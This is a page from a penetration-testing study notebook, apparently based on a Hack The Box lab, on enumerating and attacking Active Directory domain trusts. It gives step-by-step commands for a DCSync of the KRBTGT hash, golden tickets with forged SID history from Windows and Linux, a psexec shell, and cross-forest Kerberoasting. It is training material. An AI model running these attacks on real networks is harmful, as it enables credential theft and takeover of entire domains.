Martian Defense NoteBook
  • Martian Defense Notebook
  • Training and Career
    • Keeping it Real for Beginners
    • Reading and Repos
    • Media
    • Guides
      • Cybersecurity Roadmaps
      • Cybersecurity Training Topics
      • AppSec Training Pathway
      • Interview Checklist
    • Platforms
      • General
      • Offensive Security
      • Defensive Security
      • CTF Sites
      • Live Vulnerable Sites
    • Entrepreneurship Roadmaps
      • Consulting
      • Starting a Business
  • Technical Resources
    • Offensive-Cybersecurity
      • Application Security
      • General
      • Recon + OSINT
      • Infrastructure Pentesting
      • Cloud Pentesting
      • Wordlists
      • Social Engineering
      • Mobile Pentesting
      • Container Security
      • Blockchain
    • Defensive-Cybersecurity
    • General Cybersecurity
      • Cybersecurity Operating Systems
    • Coding/Programming
    • Reverse Engineering
    • AI and ML
  • Notes
    • Product Security Engineering
      • DevSecOps
        • Docker
          • How to Dockerize Applications with Docker Compose (Using SQLite and Flask)
      • SAST/SCA
        • How to setup a GitHub Action for Code Security analysis
        • JavaScript Security Analysis
        • Java Security 101
        • Tools
        • CodeQL for Beginners
      • Product Security Hardening
      • Threat Modeling
      • PHP Security
    • AppSec Testing
      • Checklists
        • WEB APP PENTESTING CHECKLIST
        • API Testing Checklist
        • Android Pentesting Checklist
        • IoS Pentesting Checklist
        • Thick Client Pentesting Checklist
        • Secure Code Review Checklist
      • Targeted Test Cases
        • Part 1
        • Part 2
      • Common Web Attack and Prevention List
      • Ports and associated Vectors
      • DNS
      • Web Tools
      • Command Injection Testing
      • JWTs and JSON
    • Security Research
      • Publishing CVEs
      • Threat Intelligence
      • Shodan Dork Cheatsheet
      • Github Dorks
      • Bug Bounty
        • Bug Bounty Programs
      • Forums
    • Coding/Programming
      • Secure Coding Practices Checklist
      • JavaScript
      • Python
        • Quick Notes
        • Python Basics for Pentesters
        • Python Snippets
        • XML Basics with Python
      • Golang
        • Theory
        • Security
        • Modules
        • Entry Points
        • File Forensics
        • Cryptography and Encoding
        • Golang Snippets
      • PHP
        • Setup
        • Syntax
        • Variables and Data Types
        • Control Structures
        • Arrays
        • Functions
        • OOP Concepts
        • Database Integration
        • Handling HTTP Methods
        • Session Management
        • File Uploads
        • Email Function
        • Error Handling
        • Advanced Topics and Best Practices
    • Network Security
      • Domain Trust Enumeration
      • Bleeding Edge Vulnerabilities
      • Post-Exploitation
      • Access Control Lists and Entries (ACL & ACE)
      • Credentialed Enumeration
      • Password Attacks
        • Internal Password Spraying
        • Remote Password Attacks
        • Linux Local Password Attacks
        • Windows Local Password Attacks
        • Windows Lateral Movement
      • PowerView
      • Pivoting, Tunneling and Forwarding
        • Advanced Tunneling Methods
        • Dynamic Port Forwarding (SSH + Socks)
        • Port Forwarding Tools
        • SoCat
      • Linux Privilege Escalation
      • Windows Privesc
        • OS Attacks
        • Windows User Privileges
        • Windows Group Privileges
        • Manual Enumeration
        • Credential Theft
      • Kerberos Attacks
        • Kerberos Quick Reference Sheet
    • Cloud Security Testing
    • Defensive Security
      • Splunk
        • Basic Queries
        • Dashboards
      • Forensics
        • Volatility
      • WireShark filters
    • Governance, Risk, Compliance
      • Vulnerability Management Lifecycle
    • Capture-the-Flag Training
      • Vulnerable Machine Checklist
      • Reverse Engineering Checklist
      • Mobile Checklist
      • Forensics Checklist
      • Binary Exploitation
      • Cryptography Checklist
    • Reporting
    • PowerShell
    • Linux Basics
    • Basic IT Tasks
  • Digital Privacy and Hygiene
    • Personal Information Removal Services
    • De-Googling Android
    • DNS Services
    • Privacy References
    • Opsec
  • RedPlanet Labs
    • PyGOAT
    • OWASP Juice Shop
Powered by GitBook
On this page
  • Enumerate Domain Trusts (PowerView)
  • Show Existing Trusts
  • Show Trust Mapping
  • Show Users in the Child Domain
  • Attacking Domain Trusts - Child -> Parent (Windows)
  • 1 Obtaining KRBTGT NT Hash
  • 2 Obtaining SID Child Domain
  • 3 Name Target User
  • 4 FQDN Child Domain
  • 5 SID Enterprise Admins Group
  • 6 Putting It All Together
  • 7 Confirm Ticket
  • 8 DCsync
  • Attacking Domain Trusts - Child -> Parent (Linux)
  • Automatic Way
  • Attacking Domain Trust - Cross-Forest (Windows)
  • Cross-Forest Kerberoasting
  • Admin Password Reuse & Group Membership
  • SID History Abuse
  • Attacking Domain Trusts - Cross-Forest Trust Abuse (Linux)
  • Cross-Forest Kerberosting
  1. Notes
  2. Network Security

Domain Trust Enumeration

Enumerate Domain Trusts (PowerView)

Show Existing Trusts

Get-Domaintrust

Show Trust Mapping

Get-DomainTrustMapping

Show Users in the Child Domain

Get-DomainUser -Domain LOGISTICS.INLANEFREIGHT.LOCAL | select SamAccountName

Attacking Domain Trusts - Child -> Parent (Windows)

To perform this attack after compromising a child domain, we need the following:

  1. The KRBTGT hash for the child domain

  2. The SID for the child domain

  3. The name of a target user in the child domain (does not need to exist!)

  4. The FQDN of the child domain.

  5. The SID of the Enterprise Admins group of the root domain.

  6. With this data collected, the attack can be performed with Mimikatz.

1 Obtaining KRBTGT NT Hash

mimikatz # lsadump::dcsync /user:LOGISTICS\krbtgt

2 Obtaining SID Child Domain

Get-DomainSID

3 Name Target User

# Can be a fake usernamr

4 FQDN Child Domain

Get-Domaintrust

5 SID Enterprise Admins Group

Get-DomainGroup -Domain INLANEFREIGHT.LOCAL -Identity "Enterprise Admins" | select distinguishedname,objectsid

6 Putting It All Together

# Mimikatz Way
kerberos::golden /user:hacker /domain:LOGISTICS.INLANEFREIGHT.LOCAL /sid:S-1-5-21-2806153819-209893948-922872689 /krbtgt:9d765b482771505cbe97411065964d5f /sids:S-1-5-21-3842939050-3880317879-2865463114-519 /ptt

# Rubeus Way
\Rubeus.exe golden /rc4:9d765b482771505cbe97411065964d5f /domain:LOGISTICS.INLANEFREIGHT.LOCAL /sid:S-1-5-21-2806153819-209893948-922872689  /sids:S-1-5-21-3842939050-3880317879-2865463114-519 /user:hacker /ptt

7 Confirm Ticket

# List Tickets
klist

8 DCsync

# Mimikatz
lsadump::dcsync

Attacking Domain Trusts - Child -> Parent (Linux)

We can also perform the attack shown in the previous section from a Linux attack host. To do so, we'll still need to gather the same bits of information:

  1. The KRBTGT hash for the child domain

  2. The SID for the child domain

  3. The name of a target user in the child domain (does not need to exist!)

  4. The FQDN of the child domain

  5. The SID of the Enterprise Admins group of the root domain

1 Get KRBTGT NT Hash

secretsdump.py logistics.inlanefreight.local/htb-student_adm@172.16.5.240 -just-dc-user LOGISTICS/krbtgt

2 Get SID Child Domain

lookupsid.py logistics.inlanefreight.local/htb-student_adm@172.16.5.240 | grep "Domain SID"

3 Name Target User

Can be any name

4 Get SID Enterprise Admins

lookupsid.py logistics.inlanefreight.local/htb-student_adm@172.16.5.5 | grep -B12 "Enterprise Admins"

5 Putting it all Together

ticketer.py -nthash 9d765b482771505cbe97411065964d5f -domain LOGISTICS.INLANEFREIGHT.LOCAL -domain-sid S-1-5-21-2806153819-209893948-922872689 -extra-sid S-1-5-21-3842939050-3880317879-2865463114-519 hacker

6 Export ccache

export KRB5CCNAME=hacker.ccache

7 Get Shell

psexec.py LOGISTICS.INLANEFREIGHT.LOCAL/hacker@academy-ea-dc01.inlanefreight.local -k -no-pass -target-ip 172.16.5.5

Automatic Way

raiseChild.py -target-exec 172.16.5.5 LOGISTICS.INLANEFREIGHT.LOCAL/htb-student_adm

Attacking Domain Trust - Cross-Forest (Windows)

Cross-Forest Kerberoasting

# Enumerate Cross Forest Users with SPN
Get-DomainUser -SPN -Domain FREIGHTLOGISTICS.LOCAL | select SamAccountName

# Rubeus /Domain flag
.\Rubeus.exe kerberoast /domain:FREIGHTLOGISTICS.LOCAL /user:mssqlsvc /nowrap

Admin Password Reuse & Group Membership

# Check Foreign Groups
Get-DomainForeignGroupMember -Domain FREIGHTLOGISTICS.LOCAL

# Convert SID
Convert-SidToName <SID>

# Login, if we are part of the administrators group
Enter-PSSession -ComputerName ACADEMY-EA-DC03.FREIGHTLOGISTICS.LOCAL -Credential INLANEFREIGHT\administrator

SID History Abuse

![[Pasted image 20230428181936.png]]

Attacking Domain Trusts - Cross-Forest Trust Abuse (Linux)

Cross-Forest Kerberosting

# Using -target-domain
GetUserSPNs.py -request -target-domain FREIGHTLOGISTICS.LOCAL INLANEFREIGHT.LOCAL/wley
PreviousNetwork SecurityNextBleeding Edge Vulnerabilities

Last updated 5 months ago